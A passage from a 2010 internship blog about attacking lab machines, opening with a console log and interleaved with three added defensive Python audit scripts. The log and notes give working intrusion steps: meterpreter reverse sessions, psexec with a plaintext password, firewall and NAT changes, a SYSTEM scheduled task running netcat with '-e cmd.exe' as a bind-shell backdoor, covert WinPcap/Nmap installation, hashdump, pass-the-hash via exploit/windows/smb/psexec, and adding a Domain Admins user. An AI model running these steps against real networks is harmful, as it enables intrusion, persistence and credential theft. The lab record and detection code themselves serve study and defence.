C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp on srv-DC:

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" di

psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh

netsh exited on srv-DC with error code 0.

/* The preceding appears weird because I had copied the command into the console, realized it was wrong, and tried to correct it. The console wouldn't let me backspace past the beginning of the line, so I ended up running a "half command" via psexec. I do see that it works though; I finally got the quoting right. I think the dash in the name argument was screwing things up and needed to be quoted. */

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

The requested operation requires elevation.
netsh exited on srv-DC with error code 1.

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

Ok.
netsh exited on srv-DC with error code 0.

/* Woo hoo! Added the -s argument to run as SYSTEM and it worked. I now have a firewall rule in place */

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

192.168.1.188 is not an acceptable value for proto.
netsh exited on srv-DC with error code 1.

/* Oops, missed a necessary argument. Added it and tried again but things got screwed for unknown reasons and I had to exit and rerun the exploit to start a new session. */

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

Terminate channel 1? [y/N]
n

Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter >
meterpreter >
meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > background
msf exploit(handler) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter NT AUTHORITY\SYSTEM @ WKS-XP1 192.168.1.188:31337 -> 192.168.1.250:62571

msf exploit(handler) > sessions -i 1
[-] Invalid session identifier: 1
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > exit

[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 3 opened (192.168.1.188:31337 -> 192.168.1.250:61734)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 3
[-] The 'stdapi' extension has already been loaded.

meterpreter > pwd
C:\WINDOWS\TEMP
meterpreter > shell
Process 308 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

The static port mapping from 192.168.1.188/9999 to 192.168.2.50/9999 requires 192.168.1.188 to be part of a configured address range. To define a static port mapping on this interface's assigned IP address, please specify 0.0.0.0 as the public address for the mapping.

netsh exited on srv-DC with error code 1.

/* I was trying to limit access to only wks-Matriux. It didn't work and it was too late at night to understand why, so I just set to 0.0.0.0 */

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999

netsh exited on srv-DC with error code 0.

/* OK, I think I now have portmapping and a firewall rule in place :) */

C:\Program Files\ps>netsh
exit
exit

/* Hanging screwiness follows, had to terminate and re-establish session */

Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter > it
[-] Unknown command: it.
meterpreter > exit

[*] Meterpreter session 3 closed. Reason: User exit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 4 opened (192.168.1.188:31337 -> 192.168.1.250:61737)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 4
[-] The 'stdapi' extension has already been loaded.

meterpreter > shell
Process 1008 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
Ok.

/* This is adding the firewall opening to the local workstation. Netsh is different on XP */

C:\Program Files\ps>schtasks /?
schtasks /?

SCHTASKS /parameter [arguments]

Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.

Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.

Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?


C:\Program Files\ps>schtasks /create /?
schtasks /create /?

SCHTASKS /Create [/S system [/U username [/P password]]]
[/RU username [/RP password]] /SC schedule [/MO modifier] [/D day]
[/I idletime] /TN taskname /TR taskrun [/ST starttime] [/M months]
[/SD startdate] [/ED enddate]

Description:
Enables an administrator to create scheduled tasks on a local or
remote systems.

Parameter List:
/S system Specifies the remote system to
connect to. If omitted the system
parameter defaults to the local
system.

/U username Specifies the user context under
which the command should execute.

/P password Specifies the password for the given
user context.

/RU username Specifies the user account (user
context) under which the task runs.
For the system account, valid values
are "", "NT AUTHORITY\SYSTEM" or
"SYSTEM".

/RP password Specifies the password for the user.
To prompt for the password, the value
must be either "*" or none.
Password will not effect for the
system account.

/SC schedule Specifies the schedule frequency.
Valid schedule types: MINUTE, HOURLY,
DAILY, WEEKLY, MONTHLY, ONCE,
ONSTART, ONLOGON, ONIDLE.

/MO modifier Refines the schedule type to allow
finer control over schedule
recurrence. Valid values are listed
in the "Modifiers" section below.

/D days Specifies the day of the week to run
the task. Valid values: MON, TUE,
WED, THU, FRI, SAT, SUN and for
MONTHLY schedules 1 - 31 (days of the
month).

/M months Specifies month(s) of the year.
Defaults to the first day of the
month. Valid values: JAN, FEB, MAR,
APR, MAY, JUN, JUL, AUG, SEP, OCT,
NOV, DEC.

/I idletime Specifies the amount of idle time to
wait before running a scheduled
ONIDLE task.
Valid range: 1 - 999 minutes.

/TN taskname Specifies a name which uniquely
identifies this scheduled task.

/TR taskrun Specifies the path and file name of
the program to be run by this
scheduled task.
Example: C:\windows\system32\calc.exe

/ST starttime Specifies the time to run the task.
The time format is HH:MM:SS (24 hour
time) for example, 14:30:00 for
2:30 PM.

/SD startdate Specifies the first date on which the
task runs. The format is
"mm/dd/yyyy".

/ED enddate Specifies the last date when the task
should run. The format is
"mm/dd/yyyy".

/? Displays this help/usage.

Modifiers: Valid values for the /MO switch per schedule type:
MINUTE: 1 - 1439 minutes.
HOURLY: 1 - 23 hours.
DAILY: 1 - 365 days.
WEEKLY: weeks 1 - 52.
ONCE: No modifiers.
ONSTART: No modifiers.
ONLOGON: No modifiers.
ONIDLE: No modifiers.
MONTHLY: 1 - 12, or
FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY.

Examples:
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN rtest2 /TR calc.exe /ST 12:00:00
/SD 10/20/2001 /ED 10/20/2001 /RU runasuser /RP
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN game
/TR c:\windows\system32\freecell
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC WEEKLY /TN test1 /TR notepad.exe
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN test2 /TR c:\windows\system32\notepad.exe
/ST 18:30:00 /RU runasuser /RP *
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN cell
/TR c:\windows\system32\freecell /RU runasuser


/* They don't give an example of how to pass arguments to a task or how to use a task path with spaces, thanks MS :| Experimentation is painful in the console with no tab completion. The easiest way to do this is to either use short pathnames (progra~1) or to create a batch file with your command line in it, then use the task to run that. */

C:\Program Files\ps>schtasks /?
schtasks /?

SCHTASKS /parameter [arguments]

Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.

Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.

Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?

C:\Program Files\ps>schtasks /change /?
schtasks /change /?

SCHTASKS /Change [/S system [/U username [/P password]]] {[/RU runasuser]
[/RP runaspassword] [/TR taskrun]} /TN taskname

Description:
Changes the program to run, or user account and password used
by a scheduled task.

Parameter List:
/S system Specifies the remote system to connect to.

/U username Specifies the user context under
which the command should execute.

/P password Specifies the password for the given
user context.

/RU username Changes the user name (user context) under
which the scheduled task has to run.
For the system account, valid values are
"", "NT AUTHORITY\SYSTEM" or "SYSTEM".

/RP password Specifies a new password for the existing
user context or the password for a new
user account. Password will not effect for
the system account.


/TR taskrun Specifies a new program that the scheduled
task runs. Type the path and file name of
the program.

/TN taskname Specifies which scheduled task to change.

/? Displays this help/usage.

Examples:
SCHTASKS /Change /RP password /TN "Backup and Restore"
SCHTASKS /Change /TR restore.exe /TN "Start Restore"
SCHTASKS /Change /S system /U user /P password /RU newuser
/TN "Start Backup"


C:\Program Files\ps>schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"

schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"

INFO: The Schedule Task "listen" will be created under user name ("NT AUTHORITY\SYSTEM").
SUCCESS: The scheduled task "listen" has successfully been created.

C:\Program Files\ps>exit
meterpreter > exit

[*] Meterpreter session 4 closed. Reason: User exit
msf exploit(handler) >

/* After all this, I had successfully set up:
  • portmapping on srv-DC - 192.168.2.1:9999 -> 192.168.2.50:9999
  • firewall rule on srv-DC - allow tcp from any to any 9999 in
  • firewall rule on wks-xp1 - allow tcp from any to any 9999 in
  • task scheduled to run netcat (as system) at logon, listen on 9999 and provide a command shell to any connection.
I tested this and can now successfully connect from outside the gateway: nc -nvv 192.168.1.250 9999 (srv-DC OutsideNIC) */
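What a defender would look for on wks-xp1 after the changes summarised above, as an added example that is not part of the original notes: a Python audit over the text of netsh advfirewall firewall show rule name=all and schtasks /query /fo CSV /v. Both sample outputs are constructed for this example (the schtasks CSV is reduced to the columns the audit uses) and the port allowlist is an assumption. The parser expects the advfirewall listing format of Vista and later; the XP host's older netsh firewall output has a different layout and would need its own parser.

```python
"""Host-side audit for the two persistence artifacts the notes above
leave on wks-xp1: an inbound firewall allow rule on an unexpected port
and a SYSTEM scheduled task that runs at logon.  Inputs are the text of
`netsh advfirewall firewall show rule name=all` and
`schtasks /query /fo CSV /v` collected on the host; both samples below
are constructed for this example (column subset for schtasks)."""
import csv
import io
import re

# Constructed sample of `netsh advfirewall firewall show rule name=all`.
SAMPLE_NETSH = """
Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
Grouping:                             Core Networking
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Edge traversal:                       No
Action:                               Allow

Rule Name:                            jah-netcat
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            9999
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow
"""

# Constructed sample of `schtasks /query /fo CSV /v`, reduced to the
# columns this audit needs.
SAMPLE_SCHTASKS = r"""
"HostName","TaskName","Task To Run","Schedule Type","Run As User"
"WKS-XP1","Nightly Backup","C:\Program Files\Backup\backup.exe /full","Daily","TEST\backupsvc"
"WKS-XP1","listen","C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe","At logon time","NT AUTHORITY\SYSTEM"
"""

FIELD = re.compile(r"^([A-Za-z][A-Za-z ]*?):\s*(.*)$")


def parse_netsh_rules(text):
    """Split the netsh listing into one dict per rule, keyed by field name."""
    rules, current = [], None
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue  # separator dashes and blank lines
        key, value = m.group(1), m.group(2).strip()
        if key == "Rule Name":
            current = {key: value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def suspicious_inbound_rules(rules, expected_ports):
    """Enabled inbound allow rules whose local port is not on the expected list."""
    hits = []
    for r in rules:
        if (r.get("Enabled"), r.get("Direction"), r.get("Action")) != ("Yes", "In", "Allow"):
            continue
        port = r.get("LocalPort", "Any")
        if port not in expected_ports:
            hits.append((r["Rule Name"], r.get("Protocol"), port, r.get("RemoteIP")))
    return hits


def parse_schtasks_csv(text):
    return list(csv.DictReader(io.StringIO(text.strip())))


SYSTEM_ACCOUNTS = {"", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
SHORT_PATH = re.compile(r"~\d+\\")   # 8.3 component such as PROGRA~1\


def suspicious_tasks(tasks):
    """Tasks matching the pattern in the notes: SYSTEM plus a logon trigger,
    a command line that invokes cmd.exe, or an 8.3 short path."""
    hits = []
    for t in tasks:
        cmd = t.get("Task To Run", "")
        reasons = []
        if (t.get("Run As User", "").upper() in SYSTEM_ACCOUNTS
                and "logon" in t.get("Schedule Type", "").lower()):
            reasons.append("runs as SYSTEM at logon")
        if re.search(r"\bcmd\.exe\b", cmd, re.I):
            reasons.append("command line invokes cmd.exe")
        if SHORT_PATH.search(cmd):
            reasons.append("uses an 8.3 short path")
        if reasons:
            hits.append((t["TaskName"], reasons))
    return hits


if __name__ == "__main__":
    for hit in suspicious_inbound_rules(parse_netsh_rules(SAMPLE_NETSH), {"445", "3389"}):
        print("firewall:", hit)
    for hit in suspicious_tasks(parse_schtasks_csv(SAMPLE_SCHTASKS)):
        print("task:", hit)
```

To use it on a real host, read the two command outputs from files in place of the samples. The NAT port mapping the notes add on srv-DC is part of the gateway's RRAS configuration and has to be audited there, not on the workstation; and once the task has fired, the listener also shows up as a LISTENING socket owned by an nc.exe process in netstat -ano, which needs no parsing at all.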

Sunday, April 11, 2010

SimWitty Internship: Week 13

Well, this week is going to be kind of hard to write up. There was so much going on with trying to attack the other VMs that it began to blur somewhat in my head. I tried to keep notes as much as possible but it still may seem a bit confused.

Let's see, for starters... I got wks-XP1 compromised and set up the meterpreter reverse tcp executable to try connecting back to me every 5 minutes. This worked well and gave me an easy way back into the machine. I was then able to use the meterpreter session to install winpcap and nmap on wks-XP1.


Installing WinPcap and Nmap
The easiest way to get the right files to install for winpcap is to install it on a VM running the same OS as your target (I just used the actual VM in the case of this lab, then uninstalled it when I had what I wanted). Then create a folder to hold your files, and copy the following to your folder:

  • c:\windows\system32\Packet.dll
  • c:\windows\system32\pthreadVC.dll
  • c:\windows\system32\wpcap.dll
  • c:\windows\system32\drivers\npf.sys
If you want to install the whole thing so it can be uninstalled, also copy over the files in c:\program files\winpcap and export the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WinPcapInst so you can import it on the target. For Nmap, you want to download the zipfile they make available for Windows. Unzip the file into a subfolder next to your winpcap files, e.g.:
\---tools
    +---nmap
    \---winpcap

To install WinPcap, do the following:

  • Connect via meterpreter to the target (you will need admin privs)
  • Change your local working directory to where you have your winpcap files
  • Change your target working directory to C:\windows\system32 (don't forget you need double backslashes for the path in meterpreter)
  • Upload Packet.dll, pthreadVC.dll, and wpcap.dll
  • Change target working directory to C:\windows\system32\drivers
  • Upload npf.sys
  • Open a shell on the Victim
To create the service, run this command (note the space after each equals sign; sc requires it):
sc create npf type= kernel start= auto error= normal binpath= "c:\windows\system32\drivers\npf.sys"

To install Nmap do the following:

  • cd to c:\program files
  • mkdir nmap
  • cd nmap
  • Jump back to meterpreter prompt
  • Upload the nmap files
  • Jump back to a command shell (be sure you're in the nmap directory) and execute the following:
       vcredist_x86.exe /q:a /c:"msiexec /i vcredist.msi /qn /l*v %temp%\vcredist_x86.log"
The vcredist command line is courtesy of MSDN.

You should now have working copies of Nmap and WinPcap on the victim. Start WinPcap with net start npf, then check Nmap with nmap --version.
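For the driver and service this section installs, the check a defender would run on the target is a comparison of the host's kernel-driver services against a build-time baseline. This is an added Python example, not part of the original notes; the sc query and sc qc output, the baseline set and the service names in it are constructed for the example.

```python
"""Baseline check for the kernel-driver service the notes above create
with `sc create npf type= kernel ...`.  Inputs are the text of
`sc query type= driver state= all` (service inventory) and, for each new
name, `sc qc <name>` (its configuration); the baseline is the set of
driver service names recorded when the image was built.  All samples are
constructed for this example."""
import re

SAMPLE_SC_QUERY = """
SERVICE_NAME: Beep
DISPLAY_NAME: Beep
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: npf
DISPLAY_NAME: npf
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: Tcpip
DISPLAY_NAME: TCP/IP Protocol Driver
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""

# Constructed `sc qc npf` output, keyed by service name.
SAMPLE_SC_QC = {
    "npf": r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: npf
        TYPE               : 1   KERNEL_DRIVER
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\windows\system32\drivers\npf.sys
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : npf
        DEPENDENCIES       :
        SERVICE_START_NAME :
""",
}

# Constructed baseline: driver service names present on the clean build.
BASELINE_DRIVERS = {"beep", "tcpip"}

HEADER = re.compile(r"^(SERVICE_NAME|DISPLAY_NAME):\s*(.*)$")
FIELD = re.compile(r"^\s+([A-Z_]+)\s*:\s*(.*)$")


def parse_sc_blocks(text):
    """Parse the SERVICE_NAME blocks that both `sc query` and `sc qc` print."""
    services, current = [], None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            if m.group(1) == "SERVICE_NAME":
                current = {"name": m.group(2).strip()}
                services.append(current)
            elif current is not None:
                current["DISPLAY_NAME"] = m.group(2).strip()
            continue
        m = FIELD.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2).strip()
    return services


def new_kernel_drivers(query_text, baseline):
    """Kernel-mode driver services whose name is not in the baseline."""
    known = {b.lower() for b in baseline}
    return [s for s in parse_sc_blocks(query_text)
            if s["name"].lower() not in known
            and "KERNEL_DRIVER" in s.get("TYPE", "")]


def describe(service, qc_outputs):
    """Attach START_TYPE and BINARY_PATH_NAME from `sc qc` where available."""
    blocks = parse_sc_blocks(qc_outputs.get(service["name"], ""))
    cfg = blocks[0] if blocks else {}
    return {
        "name": service["name"],
        "state": service.get("STATE", "?"),
        "start": cfg.get("START_TYPE", "?"),
        "image": cfg.get("BINARY_PATH_NAME", "?"),
    }


def audit(query_text=SAMPLE_SC_QUERY, qc_outputs=SAMPLE_SC_QC, baseline=BASELINE_DRIVERS):
    return [describe(s, qc_outputs) for s in new_kernel_drivers(query_text, baseline)]


if __name__ == "__main__":
    for finding in audit():
        print("new kernel driver:", finding)
```

On Vista and later the Service Control Manager also writes each new service to the System log as event 7045, image path included, which gives the same finding without a baseline. The four files dropped into system32 and system32\drivers are what a file-integrity baseline of those two directories would report.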

After installing both on wks-XP1, I ran a scan of the subnet and output it to XML. I then downloaded (via meterpreter) the XML file to the attack VM. I tried importing it into a new workspace in the db (assuming you have already connected to the db):
db_workspace -a nmap
db_workspace nmap
db_import_nmap_xml /path/to/xml_file
I made sure that metasploit was routing 192.168.1.0/24 through the active session, and then tried db_autopwn but it didn't work.

Finally I decided to try using exploit/windows/smb/psexec (thank you YouTube for the Mubix Video). I had the existing meterpreter session connected back to port 31337 so I set LPORT for this instance to 31336. For SMBUser I used Administrator, and for SMBPass I pasted in the admin hash I got from running hashdump in the meterpreter session. I set the RHOST accordingly for each successive attempt, starting with wks-XP2 at 192.168.2.51. This worked fine, and allowed me to use hashdump on each machine to get the password hashes. Unlike the video though, this would NOT work against the Domain Controller (srv-DC).

I tried numerous times with different names and hashes against srv-DC. All returned either STATUS_LOGON_FAILURE or STATUS_ACCESS_DENIED. I am not exactly sure why this is. In the time I had to investigate, I found a link talking about NullSessionPipes that may have something to do with it. I never was successful running this exploit against the DC, but I was able to add a user to the Domain Admins group. I don't know exactly why one worked and the other didn't. The syntax for the incognito command add_group_user is a little weird, it is add_group_user -h DC>
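Detection for the two results reported in this paragraph (hash-based SMB authentication against the workstations and a user added to Domain Admins), as an added Python example that is not from the original notes. It reads a CSV export of selected Security log fields; the event IDs are the Vista/2008-and-later ones (4624, 4728, 4732, 4756), and the column layout, the records, the account and group names and the addresses are all constructed for this example.

```python
"""Security-log checks for the two actions described above: a member
added to a privileged group, and an NTLM network logon by an admin
account (what authenticating over SMB with a pasted hash instead of a
password looks like on the target).  Input is a CSV export of selected
Security event fields using Vista/2008-and-later event IDs; the records
are constructed for this example and are not from the lab."""
import csv
import io

SAMPLE_EVENTS = r"""
EventID,TimeCreated,Computer,SubjectUserName,TargetUserName,TargetDomainName,MemberName,LogonType,AuthenticationPackageName,IpAddress
4624,2010-04-10T22:14:03,WKS-XP2,-,Administrator,WKS-XP2,-,3,NTLM,192.168.2.50
4624,2010-04-10T22:15:11,SRV-FILE,-,jsmith,TEST,-,2,Kerberos,-
4624,2010-04-10T22:16:40,SRV-FILE,-,Administrator,TEST,-,3,Kerberos,192.168.2.60
4728,2010-04-10T22:20:45,SRV-DC,Administrator,Domain Admins,TEST,"CN=newadmin,CN=Users,DC=test,DC=local",-,-,-
4732,2010-04-10T22:21:02,WKS-XP2,Administrator,Remote Desktop Users,WKS-XP2,"CN=helpdesk,CN=Users,DC=test,DC=local",-,-,-
"""

# Group-membership events: global (4728), local (4732), universal (4756).
GROUP_EVENTS = {
    "4728": "security-enabled global group",
    "4732": "security-enabled local group",
    "4756": "security-enabled universal group",
}
# Groups treated as privileged for this check (assumption for the example).
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}
# Accounts whose network logons get the NTLM check (assumption for the example).
ADMIN_ACCOUNTS = {"administrator"}


def load_events(text):
    return list(csv.DictReader(io.StringIO(text.strip())))


def privileged_group_changes(events):
    """4728/4732/4756 where the target group is one we treat as privileged."""
    hits = []
    for e in events:
        kind = GROUP_EVENTS.get(e["EventID"])
        if kind and e["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            hits.append({
                "when": e["TimeCreated"], "on": e["Computer"],
                "group": f'{e["TargetDomainName"]}\\{e["TargetUserName"]}',
                "member": e["MemberName"], "by": e["SubjectUserName"],
                "kind": kind,
            })
    return hits


def ntlm_admin_network_logons(events, admin_accounts=ADMIN_ACCOUNTS):
    """4624 logons of type 3 (network) authenticated with NTLM for an admin
    account.  SMB authentication with a hash can only be NTLM, never
    Kerberos, so these are the records to compare against the list of
    hosts admins are expected to work from."""
    return [
        {"when": e["TimeCreated"], "on": e["Computer"],
         "account": e["TargetUserName"], "from": e["IpAddress"]}
        for e in events
        if e["EventID"] == "4624" and e["LogonType"] == "3"
        and e["AuthenticationPackageName"].upper() == "NTLM"
        and e["TargetUserName"].lower() in admin_accounts
    ]


if __name__ == "__main__":
    events = load_events(SAMPLE_EVENTS)
    for hit in privileged_group_changes(events):
        print("group change:", hit)
    for hit in ntlm_admin_network_logons(events):
        print("ntlm admin logon:", hit)
```

The NTLM check is a heuristic: ordinary password logons from hosts that cannot use Kerberos produce the same record, so its value is in comparing the source address with the known administrative workstations rather than in the match itself. The group-change events are written by the domain controller that processed the change, which is why in this lab they would be found on srv-DC rather than on the workstation the command was issued from.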

Getting into the Domain Controller needs more investigation and I think I will stretch it into next week a little. I hope this didn't come out as too much of a jumble, it sure felt like one.